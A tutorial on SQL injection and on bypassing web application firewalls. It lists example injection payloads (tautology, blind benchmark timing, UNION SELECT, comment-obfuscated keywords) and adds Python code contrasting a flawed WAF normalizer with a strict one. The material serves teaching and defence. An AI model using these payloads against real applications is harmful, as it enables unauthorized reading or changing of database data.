SQL Injection Bypassing WAF

SQLi
A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

SQL Injection – Basic Concepts
There are two types of SQL Injection:

• SQL Injection into a String/Char parameter. Example: SELECT * from table where example = 'Example'

• SQL Injection into a Numeric parameter. Example: SELECT * from table where id = 123


Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions:

• A vulnerable request can get into Insert, Update, Delete, etc. Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'

• Blind SQL Injection. Example: select * from table where id = 1 AND if((ascii(lower(substring((select user),$i,1))))!=$s,1,benchmark(200000,md5(now)))

• Exploitation features for various DBMSs. Example (MySQL): SELECT * from table where id = 1 union select 1,2,3. Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3

Bypassing WAF: SQL Injection - Normalization Method

Example Number (1) of a vulnerability in the function of request normalization

• The following request doesn't allow anyone to conduct an attack: /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*
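The flaw above is that the WAF normalizes the request differently from the DBMS: it defangs the keyword copies inside the comments (giving the "uni X on" form) but leaves the comment delimiters in place, so a signature that expects UNION followed by whitespace and SELECT never fires, while MySQL discards the comments and executes the real union select. The following is an added example, not code from the original slides: a simplified model of that weak normalizer beside a strict one that treats every /* ... */ as whitespace the way the DBMS does, run over the two requests quoted above. The signature regex and the keyword-defanging logic are assumptions chosen to reproduce the output shown on the page.

```python
import re
from urllib.parse import unquote_plus

# Signature applied after normalization: UNION directly followed by SELECT.
SIGNATURE = re.compile(r"\bunion\s+select\b", re.I)
COMMENT = re.compile(r"/\*.*?\*/", re.S)
KEYWORD = re.compile(r"\b(union|select)\b", re.I)


def weak_normalize(query: str) -> str:
    """Assumed model of the flawed normalizer: URL-decode, then defang keywords
    that sit inside a comment (union -> uni X on) while keeping the comment
    delimiters. The DBMS never reads the comment body, so this work is wasted."""
    decoded = unquote_plus(query)
    defang = lambda m: KEYWORD.sub(
        lambda k: k.group(0)[:3] + " X " + k.group(0)[3:], m.group(0))
    return COMMENT.sub(defang, decoded)


def strict_normalize(query: str) -> str:
    """Normalize the way MySQL reads the statement: URL-decode, replace every
    /* ... */ comment with whitespace (an unterminated /* swallows the rest of
    the line), then collapse whitespace runs."""
    decoded = unquote_plus(query)
    no_comments = COMMENT.sub(" ", decoded)
    no_comments = re.sub(r"/\*.*$", " ", no_comments, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).strip()


def blocked(query: str, normalize) -> bool:
    """True when the signature matches the normalized form of the query."""
    return SIGNATURE.search(normalize(query)) is not None


# The two requests quoted on the page (constructed sample input).
PLAIN = "id=1+union+select+1,2,3/*"
BYPASS = "id=1/*union*/union/*select*/select+1,2,3/*"

if __name__ == "__main__":
    for q in (PLAIN, BYPASS):
        print(q)
        print("  weak   ->", repr(weak_normalize(q)), "blocked =", blocked(q, weak_normalize))
        print("  strict ->", repr(strict_normalize(q)), "blocked =", blocked(q, strict_normalize))
```

With the weak normalizer only the plain request is blocked; with the strict one both requests reduce to the same "id=1 union select 1,2,3" and are caught.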